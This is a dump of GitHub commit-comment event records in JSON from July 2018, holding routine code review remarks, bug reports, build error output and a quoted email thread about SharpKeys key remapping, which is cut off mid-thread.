{"id":"7904342958","type":"CommitCommentEvent","actor":{"login":"king4k1"},"repo":{"name":"king4k1/kma-ggplot"},"payload":{"comment":{"id":29560865,"position":null,"line":null,"path":null,"commit_id":"3afd9a739e2d8cb41f933a5840b277b6cd169af2","created_at":"2018-07-02T03:48:58Z","updated_at":"2018-07-02T03:48:58Z","author_association":"OWNER","body":"[rent.zip](https://github.com/king4k1/kma-ggplot/files/2153718/rent.zip)\r\n\r\n48MB\r\n\r\n2016.09 ~ 2018.05 데이터정리"}},"created_at":"2018-07-02T03:48:58Z"}
{"id":"7904343571","type":"CommitCommentEvent","actor":{"login":"DiR3Wolf"},"repo":{"name":"snoopyjoe/plugin.video.psvue"},"payload":{"comment":{"id":29560869,"position":null,"line":null,"path":null,"commit_id":"c914b2fc5b504881b87a8f0f7985eda4c7bc20ee","created_at":"2018-07-02T03:49:15Z","updated_at":"2018-07-02T03:49:15Z","author_association":"NONE","body":"@snoopyjoe I can no longer get the error. I can play the stream find now. To recap, I have F1 in my shows(not exported), and the race was from 6am to 8am. So almost the whole day, I couldn't watch this stream, I'd get the error (I don't have the log for anymore). If I recall correctly, it was throwing an exception with get_streams, not being able to find fields from the json source. In this version, PSVue didn't have your latest PR. I tried with the new build that includes this PR, and I will get a message, instead of error, that says episode has not being aired yet. I try playing form the PSVue addon from the Kodi repo, and the same stream played fine, so it seems it is something in your code, that was introduced with the code handling the export feature, but that is my guess.\r\n My other guess if it has something to do with the stream being available for less than 8 hours. (I saw something in your code about it, but not sure) since I can play it now. Anyway, if I even encounter it again , I'll make sure to save the log this time.  "}},"created_at":"2018-07-02T03:49:15Z"}
{"id":"7904344934","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29560871,"position":66,"line":76,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T03:49:53Z","updated_at":"2018-07-02T03:49:53Z","author_association":"OWNER","body":"1. Магические константы\r\n2. Список параметров однозначно не подойдет для STM32F107"}},"created_at":"2018-07-02T03:49:53Z"}
{"id":"7904345476","type":"CommitCommentEvent","actor":{"login":"YukiKawamura0211"},"repo":{"name":"MakeSchool-Tutorials/Intro-Functions-Challenge-Playground"},"payload":{"comment":{"id":29560872,"position":null,"line":null,"path":null,"commit_id":"f762bf811aaa8d05aef5f97aee04d55bce0997b5","created_at":"2018-07-02T03:50:10Z","updated_at":"2018-07-02T03:50:10Z","author_association":"NONE","body":"Thank you for promptly handling the matter with care.\r\nI appreciate it a lot."}},"created_at":"2018-07-02T03:50:10Z"}
{"id":"7904348389","type":"CommitCommentEvent","actor":{"login":"oneToOne001"},"repo":{"name":"oneToOne001/firstService"},"payload":{"comment":{"id":29560878,"position":null,"line":null,"path":null,"commit_id":"19c2eee0131a5202953af61052e1c4249c2edf40","created_at":"2018-07-02T03:51:27Z","updated_at":"2018-07-02T03:51:27Z","author_association":"OWNER","body":"ag=aa"}},"created_at":"2018-07-02T03:51:27Z"}
{"id":"7904348966","type":"CommitCommentEvent","actor":{"login":"oneToOne001"},"repo":{"name":"oneToOne001/firstService"},"payload":{"comment":{"id":29560880,"position":50,"line":50,"path":".gitignore/.gitignore","commit_id":"19c2eee0131a5202953af61052e1c4249c2edf40","created_at":"2018-07-02T03:51:44Z","updated_at":"2018-07-02T03:51:44Z","author_association":"OWNER","body":"gw=ww"}},"created_at":"2018-07-02T03:51:44Z"}
{"id":"7904351506","type":"CommitCommentEvent","actor":{"login":"JayBazuzi"},"repo":{"name":"JayBazuzi/CliCommandLineParser"},"payload":{"comment":{"id":29560882,"position":null,"line":null,"path":null,"commit_id":"165782adba9ef961ff55a9d901362535e6eeffe7","created_at":"2018-07-02T03:52:55Z","updated_at":"2018-07-02T03:52:55Z","author_association":"OWNER","body":"ReSharper did this."}},"created_at":"2018-07-02T03:52:55Z"}
{"id":"7904351874","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29560883,"position":null,"line":null,"path":null,"commit_id":"964e71ebd1db5dd3ae3f51d1cd273f7ce2e4ef29","created_at":"2018-07-02T03:53:06Z","updated_at":"2018-07-02T03:53:06Z","author_association":"OWNER","body":"we probably need to discuss \"legacy\" ports first, to see if they are really needed.   GNOME2 requirements always set off alarms, especially when it causes multiple versions of the same port.  I just want to understand.\r\n\r\nUnrelated, this is another example of using HEAD in a post-patch (which should even be post-extract) for licensing terms when LICENSE_AWK would suffice.  It's better to keep all license stuff together *if possible*.  By a glance, it seems like it's possible here.  The head/tail combine looks like it's intending to remove the top line which might be related to the file it's extracted from, but I generally leave those in (might be interesting to know)."}},"created_at":"2018-07-02T03:53:06Z"}
{"id":"7904353042","type":"CommitCommentEvent","actor":{"login":"mach-kernel"},"repo":{"name":"K-Shadow/grape-attack"},"payload":{"comment":{"id":29560887,"position":5,"line":22,"path":"grape-attack.gemspec","commit_id":"a4ae629b38eccd070773e124bdcf22694598999b","created_at":"2018-07-02T03:53:35Z","updated_at":"2018-07-02T03:53:35Z","author_association":"NONE","body":"Make sure the specs pass and pull request this to `grape-attack`. It just hasn't been touched in a while, ensure compatibility with new Grape and do it. They would love your contribution!"}},"created_at":"2018-07-02T03:53:35Z"}
{"id":"7904353434","type":"CommitCommentEvent","actor":{"login":"JayBazuzi"},"repo":{"name":"JayBazuzi/CliCommandLineParser"},"payload":{"comment":{"id":29560890,"position":null,"line":null,"path":null,"commit_id":"cfbbd8d6c5ae552223993c4383a3672deae1975b","created_at":"2018-07-02T03:53:45Z","updated_at":"2018-07-02T03:53:45Z","author_association":"OWNER","body":"It also needs an \"Invert If\" on line 115, and maybe on line 120."}},"created_at":"2018-07-02T03:53:45Z"}
{"id":"7904355134","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29560891,"position":null,"line":null,"path":null,"commit_id":"89aa1980a8968b96882b58998fe0abd7c45f8023","created_at":"2018-07-02T03:54:28Z","updated_at":"2018-07-02T03:54:28Z","author_association":"OWNER","body":"related to other comment, this should probably be using LICENSE_AWK.  We don't care about removing identifiers."}},"created_at":"2018-07-02T03:54:28Z"}
{"id":"7904356602","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29560894,"position":null,"line":null,"path":null,"commit_id":"5527d966be5e5eb14e7ee094da6c6811a101679b","created_at":"2018-07-02T03:55:09Z","updated_at":"2018-07-02T03:55:09Z","author_association":"OWNER","body":"yep, these are good"}},"created_at":"2018-07-02T03:55:09Z"}
{"id":"7904356647","type":"CommitCommentEvent","actor":{"login":"smalaca"},"repo":{"name":"agamazanek/SpringInAction"},"payload":{"comment":{"id":29560895,"position":75,"line":87,"path":"src/test/java/pl/sda/jira/calendar/rest/rest/CalendarControllerTest.java","commit_id":"a72df1904c2fbf25f9bda55e02a0cfe6556411f5","created_at":"2018-07-02T03:55:10Z","updated_at":"2018-07-02T03:55:10Z","author_association":"COLLABORATOR","body":"remove 😄 "}},"created_at":"2018-07-02T03:55:10Z"}
{"id":"7904357763","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29560898,"position":null,"line":null,"path":null,"commit_id":"39899fe1ebd84a83efd8812c4664af28dcf5f3c3","created_at":"2018-07-02T03:55:42Z","updated_at":"2018-07-02T03:55:42Z","author_association":"OWNER","body":"just fork my latest code and it will work had to add a API to include.ps1 for cryptodredge"}},"created_at":"2018-07-02T03:55:42Z"}
{"id":"7904358640","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29560901,"position":38,"line":38,"path":"src/HardwareLayout/PortA.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T03:56:07Z","updated_at":"2018-07-02T03:56:07Z","author_association":"OWNER","body":"Название метода больше подходит по смыслу к callback`у"}},"created_at":"2018-07-02T03:56:07Z"}
{"id":"7904358990","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29560902,"position":null,"line":null,"path":null,"commit_id":"b7dc60f7b4e972610846a506b7405f3631bec364","created_at":"2018-07-02T03:56:16Z","updated_at":"2018-07-02T03:56:16Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-02T03:56:16Z"}
{"id":"7904364404","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29560914,"position":54,"line":205,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"ccf12f7754ce74851bfd5d03c216945dcff514fc","created_at":"2018-07-02T03:58:44Z","updated_at":"2018-07-02T03:58:44Z","author_association":"OWNER","body":"da verno chet ne podoomal "}},"created_at":"2018-07-02T03:58:44Z"}
{"id":"7904365183","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29560918,"position":null,"line":null,"path":null,"commit_id":"44bd0f972916ff7720879ac4e3d0fbd078438f72","created_at":"2018-07-02T03:59:07Z","updated_at":"2018-07-02T03:59:07Z","author_association":"OWNER","body":"I'm still working through some major testing with 4 version default switches, including a problematic python 37.  I was basically putting ports updates on a freeze until I got at least the 3 major systems all updated.  The new versions cause massive rebuilds and invalidate the testing.  Let's hold off on new version updates (licensing additions are fine) until python 37 is fully vetted.  may take another couple of days."}},"created_at":"2018-07-02T03:59:07Z"}
{"id":"7904367409","type":"CommitCommentEvent","actor":{"login":"Surendrajat"},"repo":{"name":"TwrpBuilder/android_device_motorola_owens"},"payload":{"comment":{"id":29560924,"position":null,"line":null,"path":null,"commit_id":"bd60ca084505cb580b0c40af83e9362a78704b79","created_at":"2018-07-02T04:00:06Z","updated_at":"2018-07-02T04:00:06Z","author_association":"MEMBER","body":"Build is failing....\r\n```bash\r\nmake: *** No rule to make target '/root/twrp/out/target/product/owens/obj/SHARED_LIBRARIES/libcryptfs_hw_intermediates/export_includes', needed by '/root/twrp/out/target/product/owens/obj/SHARED_LIBRARIES/libcryptfslollipop_intermediates/import_includes'.  Stop.\r\n```"}},"created_at":"2018-07-02T04:00:06Z"}
{"id":"7904368546","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29560932,"position":60,"line":209,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"ccf12f7754ce74851bfd5d03c216945dcff514fc","created_at":"2018-07-02T04:00:29Z","updated_at":"2018-07-02T04:00:29Z","author_association":"OWNER","body":"ponyal horosho"}},"created_at":"2018-07-02T04:00:29Z"}
{"id":"7904369973","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29560936,"position":61,"line":210,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"ccf12f7754ce74851bfd5d03c216945dcff514fc","created_at":"2018-07-02T04:01:09Z","updated_at":"2018-07-02T04:01:09Z","author_association":"OWNER","body":"ugu bez poezda udalil:-)"}},"created_at":"2018-07-02T04:01:09Z"}
{"id":"7904380918","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29560947,"position":119,"line":119,"path":"src/HardwareLayout.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T04:06:23Z","updated_at":"2018-07-02T04:06:23Z","author_association":"OWNER","body":"Насколько я понял, такое решение \"делегирует\" реализацию включения тактирования наследнику, а родитель обобщает механизм отслеживания пользователей общим ресурсом, в данном случае тактированием. В принципе все хорошо, но название метода больше наводит на мысль о событии после включения Clock`а. Как Вам имя метода \"devClockEnable\"?"}},"created_at":"2018-07-02T04:06:23Z"}
{"id":"7904382106","type":"CommitCommentEvent","actor":{"login":"JustBCgaming"},"repo":{"name":"swf541/Cold-War--The-Iron-Curtain"},"payload":{"comment":{"id":29560950,"position":null,"line":null,"path":null,"commit_id":"49e4321cadecc0095dfeaea7101fe0083b3f166a","created_at":"2018-07-02T04:06:59Z","updated_at":"2018-07-02T04:06:59Z","author_association":"NONE","body":"about damn time"}},"created_at":"2018-07-02T04:06:59Z"}
{"id":"7904386623","type":"CommitCommentEvent","actor":{"login":"leto"},"repo":{"name":"gilardh/hush-ng"},"payload":{"comment":{"id":29560960,"position":null,"line":null,"path":null,"commit_id":"7bfb18c17b92eda07139b4b052cba6002cff78cb","created_at":"2018-07-02T04:09:09Z","updated_at":"2018-07-02T04:09:09Z","author_association":"NONE","body":"This looks really awesome, will review soon! :+1:"}},"created_at":"2018-07-02T04:09:09Z"}
{"id":"7904388942","type":"CommitCommentEvent","actor":{"login":"rasciodc"},"repo":{"name":"minsk-hackerspace/lasercutter-grbl-Mega-RAMPS"},"payload":{"comment":{"id":29560967,"position":null,"line":null,"path":null,"commit_id":"94a7df3054ff023d7fca33de03ddc97901b59591","created_at":"2018-07-02T04:10:16Z","updated_at":"2018-07-02T04:10:16Z","author_association":"NONE","body":"This is indeed a superb job @jekhor! Already used it and works like a charm! Liked the clean coding and the way you managed the variable declarations!\r\n\r\nCould you point me in the direction on how to clone movements from one of the axis (x, y or z) on motors E0 or E1?\r\n\r\nI've put some hours into that but was not successful...  =(  A little light in the right path would be very helpful!\r\n\r\nThanks!\r\n"}},"created_at":"2018-07-02T04:10:16Z"}
{"id":"7904389121","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29560968,"position":110,"line":110,"path":"src/IOPort.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T04:10:21Z","updated_at":"2018-07-02T04:10:21Z","author_association":"OWNER","body":"Почему аггрегация, а не наследование?"}},"created_at":"2018-07-02T04:10:21Z"}
{"id":"7904389681","type":"CommitCommentEvent","actor":{"login":"piratesephiroth"},"repo":{"name":"ahezard/nds-bootstrap"},"payload":{"comment":{"id":29560969,"position":null,"line":null,"path":null,"commit_id":"b8f48d370c614471d77f0a9db93717c70e74dc32","created_at":"2018-07-02T04:10:38Z","updated_at":"2018-07-02T04:10:38Z","author_association":"CONTRIBUTOR","body":"This commit causes the visual glitch at the bottom of the screens of Portrait of Ruin when running on TWL  speed.\r\nIt ran perfectly fine before this (on the last release)"}},"created_at":"2018-07-02T04:10:38Z"}
{"id":"7904395233","type":"CommitCommentEvent","actor":{"login":"alfmoh"},"repo":{"name":"TeaEntityLab/fpEs"},"payload":{"comment":{"id":29560976,"position":null,"line":null,"path":null,"commit_id":"52af74af01e605d34c464f976104e7b4c27cf381","created_at":"2018-07-02T04:13:24Z","updated_at":"2018-07-02T04:13:24Z","author_association":"CONTRIBUTOR","body":"Alright 😄 "}},"created_at":"2018-07-02T04:13:24Z"}
{"id":"7904395840","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29560977,"position":30,"line":30,"path":"src/HardwareLayout/PortH.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T04:13:45Z","updated_at":"2018-07-02T04:13:45Z","author_association":"OWNER","body":"А нужен ли здесь атрибут статичности?"}},"created_at":"2018-07-02T04:13:45Z"}
{"id":"7904396627","type":"CommitCommentEvent","actor":{"login":"K-Shadow"},"repo":{"name":"K-Shadow/grape-attack"},"payload":{"comment":{"id":29560978,"position":5,"line":22,"path":"grape-attack.gemspec","commit_id":"a4ae629b38eccd070773e124bdcf22694598999b","created_at":"2018-07-02T04:14:09Z","updated_at":"2018-07-02T04:14:09Z","author_association":"OWNER","body":"The funny part is that they really don't have specs lol"}},"created_at":"2018-07-02T04:14:09Z"}
{"id":"7904397702","type":"CommitCommentEvent","actor":{"login":"Robz8"},"repo":{"name":"ahezard/nds-bootstrap"},"payload":{"comment":{"id":29560980,"position":null,"line":null,"path":null,"commit_id":"b8f48d370c614471d77f0a9db93717c70e74dc32","created_at":"2018-07-02T04:14:40Z","updated_at":"2018-07-02T04:14:40Z","author_association":"COLLABORATOR","body":"That isn't a bootstrap bug.\r\nIt's a TWL_FIRM bug that happens on occasion."}},"created_at":"2018-07-02T04:14:40Z"}
{"id":"7904398763","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29560982,"position":68,"line":217,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"ccf12f7754ce74851bfd5d03c216945dcff514fc","created_at":"2018-07-02T04:15:12Z","updated_at":"2018-07-02T04:15:12Z","author_association":"OWNER","body":"Yasno ponyal moi variant oshodil kogda metod remove_wagon podklyuchal dlya oceplenya v interface.rb to ruby vydoval oshybku ne dostupen method....chto ya i peretashil v  etot file..."}},"created_at":"2018-07-02T04:15:12Z"}
{"id":"7904402581","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29560991,"position":null,"line":null,"path":null,"commit_id":"5d6682c9ae228678b83a9f05f3af8c59ace13286","created_at":"2018-07-02T04:17:04Z","updated_at":"2018-07-02T04:17:04Z","author_association":"CONTRIBUTOR","body":"I need help to aply the regular expressions. \r\n\r\nI used this to search: `<([^<>]+rulesStrings).0>([^<]+)</([^<>]+)>`\r\nAnd this to replace: `(?s)<([^<>]+rulesStrings)>#addclosetag(((?!(<[^\\/](?!(i>)))).)*)</li>`\r\n\r\nAnd I have obtained this\r\n![screenshot_1](https://user-images.githubusercontent.com/25883820/42145105-3b81b7dc-7d8d-11e8-9aa0-2972c9df4783.jpg)\r\n\r\n\r\n"}},"created_at":"2018-07-02T04:17:04Z"}
{"id":"7904404859","type":"CommitCommentEvent","actor":{"login":"xiconxi"},"repo":{"name":"xiconxi/YubaMs"},"payload":{"comment":{"id":29560995,"position":null,"line":null,"path":null,"commit_id":"6371c55bec1ec0617473b1160d10013e7e563f5e","created_at":"2018-07-02T04:18:06Z","updated_at":"2018-07-02T04:18:06Z","author_association":"OWNER","body":"278908377@qq.com"}},"created_at":"2018-07-02T04:18:06Z"}
{"id":"7904407309","type":"CommitCommentEvent","actor":{"login":"khlau10"},"repo":{"name":"lsv/fifa-worldcup-2018"},"payload":{"comment":{"id":29561000,"position":null,"line":null,"path":null,"commit_id":"1062c426db1a380bb9cf96b9a01632320301940b","created_at":"2018-07-02T04:19:21Z","updated_at":"2018-07-02T04:19:21Z","author_association":"NONE","body":"It is this changes that could break the app because in the README is stated below:\r\n\r\n> Eg: home_team = 59 - means the winning team from match 59 will be the home_team\r\n\r\nNow that `home_team` can sometimes mean match name and sometimes mean team id, it is inconsistent.\r\n"}},"created_at":"2018-07-02T04:19:21Z"}
{"id":"7904411392","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29561009,"position":52,"line":52,"path":"src/IOPort.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T04:21:25Z","updated_at":"2018-07-02T04:21:25Z","author_association":"OWNER","body":"Какой смысл в передаче аргумента такого типа для обозначения, что порт (весь порт!) используется периферийными модулями?"}},"created_at":"2018-07-02T04:21:25Z"}
{"id":"7904415216","type":"CommitCommentEvent","actor":{"login":"piratesephiroth"},"repo":{"name":"ahezard/nds-bootstrap"},"payload":{"comment":{"id":29561013,"position":null,"line":null,"path":null,"commit_id":"b8f48d370c614471d77f0a9db93717c70e74dc32","created_at":"2018-07-02T04:23:02Z","updated_at":"2018-07-02T04:23:02Z","author_association":"CONTRIBUTOR","body":"hmmm... I tested again and it seems to be something different yeah.\r\n\r\nBut it's not random at all.\r\nMaybe it's related to DevkitARM version? If I use the last release, there's no glitch. If I build it myself, though, there's the bug right there."}},"created_at":"2018-07-02T04:23:02Z"}
{"id":"7904415803","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"dataitgirls2/tutorial"},"payload":{"comment":{"id":29561016,"position":null,"line":null,"path":null,"commit_id":"935742505c3b866aa7fcb772d1308b1032e2338b","created_at":"2018-07-02T04:23:19Z","updated_at":"2018-07-02T04:23:19Z","author_association":"CONTRIBUTOR","body":"Tutorial_2_0629_afternoon.md 으로 파일명을 지정해 주셨는데, afternoon 대신 수업 주제를 적어주는 것이 더 좋을 것 같아요."}},"created_at":"2018-07-02T04:23:19Z"}
{"id":"7904427586","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29561037,"position":30,"line":30,"path":"src/HardwareLayout/PortH.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T04:29:02Z","updated_at":"2018-07-02T04:29:02Z","author_association":"OWNER","body":"Нет, не нужен;)"}},"created_at":"2018-07-02T04:29:02Z"}
{"id":"7904428817","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"dataitgirls2/tutorial"},"payload":{"comment":{"id":29561039,"position":null,"line":null,"path":null,"commit_id":"935742505c3b866aa7fcb772d1308b1032e2338b","created_at":"2018-07-02T04:29:40Z","updated_at":"2018-07-02T04:29:40Z","author_association":"CONTRIBUTOR","body":"또, 협업으로 정리하는 내용이기 때문에 Pull Request 로 변경 내용을 보내주시고 merge 하는 형태로 진행하는 것이 히스토리 관리에 좋으니 다음 튜토리얼 부터는 Pull Request 로 보내주시고 작업이 끝나면 이슈도 종료하는 것으로 진행하는 게 github 에 익숙해지는 데 도움이 될거예요. #3 "}},"created_at":"2018-07-02T04:29:40Z"}
{"id":"7904429272","type":"CommitCommentEvent","actor":{"login":"Robz8"},"repo":{"name":"ahezard/nds-bootstrap"},"payload":{"comment":{"id":29561043,"position":null,"line":null,"path":null,"commit_id":"b8f48d370c614471d77f0a9db93717c70e74dc32","created_at":"2018-07-02T04:29:54Z","updated_at":"2018-07-02T04:29:54Z","author_association":"COLLABORATOR","body":"Is the issue fixed when waking the system from sleep mode?\r\nIf not, can you try playing it in the native resolution?"}},"created_at":"2018-07-02T04:29:54Z"}
{"id":"7904431244","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"dataitgirls2/tutorial"},"payload":{"comment":{"id":29561050,"position":null,"line":null,"path":null,"commit_id":"935742505c3b866aa7fcb772d1308b1032e2338b","created_at":"2018-07-02T04:30:46Z","updated_at":"2018-07-02T04:30:46Z","author_association":"CONTRIBUTOR","body":"꼼꼼하게 정리하느라 고생 많으셨습니다 👍 💯 "}},"created_at":"2018-07-02T04:30:46Z"}
{"id":"7904432765","type":"CommitCommentEvent","actor":{"login":"SumedhBhave"},"repo":{"name":"carufus/bbq-samiksha-app"},"payload":{"comment":{"id":29561061,"position":87,"line":381,"path":"app/src/main/java/com/app/bbq/samiksha/ChooseTableActivity.java","commit_id":"251e5c8bcfaac9dba171b45d98b21f70c457f631","created_at":"2018-07-02T04:31:31Z","updated_at":"2018-07-02T04:31:31Z","author_association":"NONE","body":"Why this cannot be an option number 6??"}},"created_at":"2018-07-02T04:31:31Z"}
{"id":"7904433639","type":"CommitCommentEvent","actor":{"login":"SumedhBhave"},"repo":{"name":"carufus/bbq-samiksha-app"},"payload":{"comment":{"id":29561065,"position":103,"line":407,"path":"app/src/main/java/com/app/bbq/samiksha/ChooseTableActivity.java","commit_id":"251e5c8bcfaac9dba171b45d98b21f70c457f631","created_at":"2018-07-02T04:31:59Z","updated_at":"2018-07-02T04:31:59Z","author_association":"NONE","body":"Same as above "}},"created_at":"2018-07-02T04:31:59Z"}
{"id":"7904434896","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29561068,"position":null,"line":null,"path":null,"commit_id":"fb96c9db351e44a202f64f780470c6319a8a9626","created_at":"2018-07-02T04:32:36Z","updated_at":"2018-07-02T04:32:36Z","author_association":"MEMBER","body":"close #9117 "}},"created_at":"2018-07-02T04:32:36Z"}
{"id":"7904434916","type":"CommitCommentEvent","actor":{"login":"randyrants"},"repo":{"name":"randyrants/sharpkeys"},"payload":{"comment":{"id":29561067,"position":null,"line":null,"path":null,"commit_id":"01740704e7232d77fe11bd968d6b3d27fe2389f7","created_at":"2018-07-02T04:32:36Z","updated_at":"2018-07-02T04:32:36Z","author_association":"OWNER","body":"If you delete all the entries and save it to the Registry and reboot, nothing will be remapped.\n\n \n\nI am 100% certain of this.\n\n \n\nFrom: ravencreature <notifications@github.com> \nSent: Saturday, June 30, 2018 12:52 AM\nTo: randyrants/sharpkeys <sharpkeys@noreply.github.com>\nCc: Randy <randy@randyrants.com>; Comment <comment@noreply.github.com>\nSubject: Re: [randyrants/sharpkeys] Update README.md (0174070)\n\n \n\n*left and right shift\n\nOn Sat, Jun 30, 2018, 2:47 AM Raven Creature <ravencreature@gmail.com <mailto:ravencreature@gmail.com> >\nwrote:\n\n> No, now it's also making shift caps lock!\n>\n> On Sat, Jun 30, 2018, 2:18 AM Raven Creature <ravencreature@gmail.com <mailto:ravencreature@gmail.com> >\n> wrote:\n>\n>> I removed all entries, saved to registry and rebooted. Again, both caps\n>> lock AND right shift acted like caps lock. For the hell of it, I did as you\n>> suggested to see if it would work regardless. Still, caps lock and right\n>> shift act like caps lock. I don't know what else to do.\n>> ~Raven\n>>\n>>\n>> On Thu, Jun 28, 2018 at 11:46 PM Raven Creature <ravencreature@gmail.com <mailto:ravencreature@gmail.com> >\n>> wrote:\n>>\n>>> Thank you, I will try that tomorrow 😁\n>>>\n>>> On Thu, Jun 28, 2018, 6:43 PM Randy <notifications@github.com <mailto:notifications@github.com> > wrote:\n>>>\n>>>> Remove every entry, save to registry, reboot. That will set you back to\n>>>> no remappings.\n>>>>\n>>>>\n>>>>\n>>>> Then, if you want Caps Lock to be a Right Shift, put Caps Lock on the\n>>>> left and Right Shift on the right, save to registry, and reboot again.\n>>>>\n>>>>\n>>>>\n>>>> From: ravencreature <notifications@github.com <mailto:notifications@github.com> >\n>>>> Sent: Thursday, June 28, 2018 9:27 AM\n>>>> To: randyrants/sharpkeys <sharpkeys@noreply.github.com <mailto:sharpkeys@noreply.github.com> >\n>>>> Cc: Randy <randy@randyrants.com <mailto:randy@randyrants.com> >; Comment <comment@noreply.github.com <mailto:comment@noreply.github.com> >\n>>>> Subject: Re: [randyrants/sharpkeys] Update README.md (0174070)\n>>>>\n>>>>\n>>>>\n>>>> How do I reset it, then?\n>>>>\n>>>> On Thu, Jun 28, 2018, 2:07 AM Randy <notifications@github.com  <mailto:notifications@github.com%20%3cmailto:%0b> <mailto:\n>>>> notifications@github.com <mailto:notifications@github.com> > > wrote:\n>>>>\n>>>> > If you map Caps Lock to another key, it no longer functions as Caps\n>>>> Lock.\n>>>> >\n>>>> >\n>>>> >\n>>>> > Likewise, if you map Right Shift to Caps Lock, then Right Shift will\n>>>> work\n>>>> > like Caps Lock.\n>>>> >\n>>>> >\n>>>> >\n>>>> > All of that is how things are supposed to work so I’m not sure where\n>>>> > things go wrong for you here.\n>>>> >\n>>>> >\n>>>> >\n>>>> > From: ravencreature <notifications@github.com  <mailto:notifications@github.com%20%3cmailto:%0b> <mailto:\n>>>> notifications@github.com <mailto:notifications@github.com> > >\n>>>> > Sent: Wednesday, June 27, 2018 11:45 PM\n>>>> > To: randyrants/sharpkeys <sharpkeys@noreply.github.com  <mailto:sharpkeys@noreply.github.com%20%3cmailto:%0b> <mailto:\n>>>> sharpkeys@noreply.github.com <mailto:sharpkeys@noreply.github.com> > >\n>>>> > Cc: Randy <randy@randyrants.com  <mailto:randy@randyrants.com%20%3cmailto:randy@randyrants.com> <mailto:randy@randyrants.com> >;\n>>>> Comment <comment@noreply.github.com  <mailto:comment@noreply.github.com%20%3cmailto:comment@noreply.github.com> <mailto:comment@noreply.github.com>\n>>>> >\n>>>> > Subject: Re: [randyrants/sharpkeys] Update README.md (0174070)\n>>>> >\n>>>> >\n>>>> >\n>>>> > Oh darn. I am having a bad day. Now caps lock is mapped to right\n>>>> shift but\n>>>> > there is no way to turn caps lock on. Am I missing something?\n>>>> >\n>>>> > ~Raven\n>>>> >\n>>>> >\n>>>> > On Thu, Jun 28, 2018 at 1:29 AM Randy <notifications@github.com <mailto:notifications@github.com%0b> \n>>>> <mailto:notifications@github.com%20%3cmailto:%0b> <mailto: <mailto:%0b> \n>>>> > notifications@github.com <mailto:notifications@github.com>  <mailto:notifications@github.com> > > wrote:\n>>>> >\n>>>> > > If it was, it wouldn’t load. Can you send me a screenshot?\n>>>> > >\n>>>> > >\n>>>> > >\n>>>> > > From: ravencreature <notifications@github.com  <mailto:notifications@github.com%20%3cmailto:%0b> <mailto:\n>>>> notifications@github.com%20%3cmailto:%0b <mailto:notifications@github.com%20%3cmailto:%0b> > <mailto: <mailto:%0b> \n>>>> > notifications@github.com <mailto:notifications@github.com>  <mailto:notifications@github.com> > >\n>>>> > > Sent: Wednesday, June 27, 2018 10:51 PM\n>>>> > > To: randyrants/sharpkeys <sharpkeys@noreply.github.com  <mailto:sharpkeys@noreply.github.com%20%3cmailto:%0b> <mailto:\n>>>> sharpkeys@noreply.github.com%20%3cmailto:%0b <mailto:sharpkeys@noreply.github.com%20%3cmailto:%0b> > <mailto: <mailto:%0b> \n>>>> 